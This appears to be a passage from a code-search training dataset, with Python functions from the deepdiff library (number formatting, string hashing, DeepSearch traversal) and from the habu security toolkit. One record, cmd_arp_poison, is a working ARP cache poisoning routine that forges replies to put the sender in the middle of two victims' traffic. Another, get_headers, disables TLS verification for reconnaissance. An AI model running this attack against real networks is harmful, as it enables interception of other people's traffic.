            ctx.prec = len(tup.digits) + tup.exponent + significant_digits
            number = number.quantize(Decimal('0.' + '0' * significant_digits))
    result = (using % significant_digits).format(number)
    # Special case for 0: "-0.00" should compare equal to "0.00"
    # NOTE(review): hard-codes "0.00" regardless of significant_digits —
    # confirm this is the intended normalization.
    if set(result) <= ZERO_DECIMAL_CHARACTERS:
        result = "0.00"
    # https://bugs.python.org/issue36622
    if number_format_notation == 'e' and isinstance(number, float):
        # Normalize exponent padding ("e+05" vs "e+5") across platforms.
        result = result.replace('+0', '+')
    return result
python
{ "resource": "" }
q29695
prepare_string_for_hashing
train
def prepare_string_for_hashing(obj, ignore_string_type_changes=False,
                               ignore_string_case=False):
    """Normalize a str/bytes value into the text that gets hashed."""
    type_name = obj.__class__.__name__
    text = obj.decode('utf-8') if isinstance(obj, bytes) else obj
    if not ignore_string_type_changes:
        # Prefix with the original type name so that b'x' and 'x' hash
        # differently when type changes matter.
        text = KEY_TO_VAL_STR.format(type_name, text)
    return text.lower() if ignore_string_case else text
python
{ "resource": "" }
q29696
DeepSearch.__search_iterable
train
def __search_iterable(self, obj, item, parent="root", parents_ids=frozenset({})):
    """Search iterables except dictionaries, sets and strings."""
    for index, element in enumerate(obj):
        child_path = "%s[%s]" % (parent, index)
        if self.__skip_this(element, parent=child_path):
            continue

        # Lower-case only string elements, and only when the search is
        # case-insensitive.
        if isinstance(element, strings) and not self.case_sensitive:
            comparable = element.lower()
        else:
            comparable = element

        if comparable == item:
            self.__report(report_key='matched_values',
                          key=child_path, value=element)
            continue

        # No direct match: recurse, guarding against reference cycles.
        element_id = id(element)
        if parents_ids and element_id in parents_ids:
            continue
        self.__search(element, item, child_path,
                      add_to_frozen_set(parents_ids, element_id))
python
{ "resource": "" }
q29697
DeepSearch.__search
train
def __search(self, obj, item, parent="root", parents_ids=frozenset({})):
    """The main search method: dispatch `obj` to a type-specific handler.

    The order of the isinstance checks is load-bearing: strings and
    numbers must be handled before the generic Iterable branch, since
    strings are themselves iterable.
    """
    if self.__skip_this(item, parent):
        return

    elif isinstance(obj, strings) and isinstance(item, strings):
        self.__search_str(obj, item, parent)

    elif isinstance(obj, strings) and isinstance(item, numbers):
        # A numeric needle can never occur inside a string haystack.
        return

    elif isinstance(obj, numbers):
        self.__search_numbers(obj, item, parent)

    elif isinstance(obj, MutableMapping):
        self.__search_dict(obj, item, parent, parents_ids)

    elif isinstance(obj, tuple):
        self.__search_tuple(obj, item, parent, parents_ids)

    elif isinstance(obj, (set, frozenset)):
        # Warn at most 10 times per search that set paths are not
        # indexable, then fall back to plain iterable search.
        if self.warning_num < 10:
            logger.warning(
                "Set item detected in the path."
                "'set' objects do NOT support indexing. But DeepSearch will still report a path."
            )
            self.warning_num += 1
        self.__search_iterable(obj, item, parent, parents_ids)

    elif isinstance(obj, Iterable):
        self.__search_iterable(obj, item, parent, parents_ids)

    else:
        # Arbitrary object: search its attributes.
        self.__search_obj(obj, item, parent, parents_ids)
python
{ "resource": "" }
q29698
cmd_arp_poison
train
def cmd_arp_poison(victim1, victim2, iface, verbose):
    """Send ARP 'is-at' packets to each victim, poisoning their ARP tables
    for send the traffic to your system.

    Note: If you want a full working Man In The Middle attack, you need
    to enable the packet forwarding on your operating system to act like a
    router. You can do that using:

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    Example:

    \b
    # habu.arpoison 192.168.0.1 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    ...
    """
    # Silence scapy's own per-packet send output; we print summaries
    # ourselves below.
    conf.verb = False

    if iface:
        conf.iface = iface

    # Resolve each victim's MAC so the forged replies can be addressed
    # directly to them.
    mac1 = getmacbyip(victim1)
    mac2 = getmacbyip(victim2)

    # Forge the poison: tell victim1 that victim2's IP is at our MAC
    # (hwsrc defaults to the sending interface's MAC), and vice versa.
    pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
    pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)

    try:
        # Re-send every second until Ctrl-C, since ARP cache entries
        # expire and could otherwise self-heal.
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass
python
{ "resource": "" }
q29699
get_headers
train
def get_headers(server):
    """Retrieve all HTTP response headers from `server`.

    Parameters
    ----------
    server : str
        URL to probe (e.g. 'https://example.com').

    Returns
    -------
    dict or bool
        Header name/value mapping, or False if the request failed.
    """
    try:
        # verify=False is deliberate for a reconnaissance helper: an
        # invalid TLS certificate should not prevent header collection.
        response = requests.head(
            server, allow_redirects=False, verify=False, timeout=5)
    except requests.exceptions.RequestException:
        # Catch the whole requests error hierarchy (ConnectionError,
        # Timeout, InvalidURL, ...): previously only ConnectionError was
        # handled, so a slow target crashed despite the explicit timeout.
        return False
    return dict(response.headers)
python
{ "resource": "" }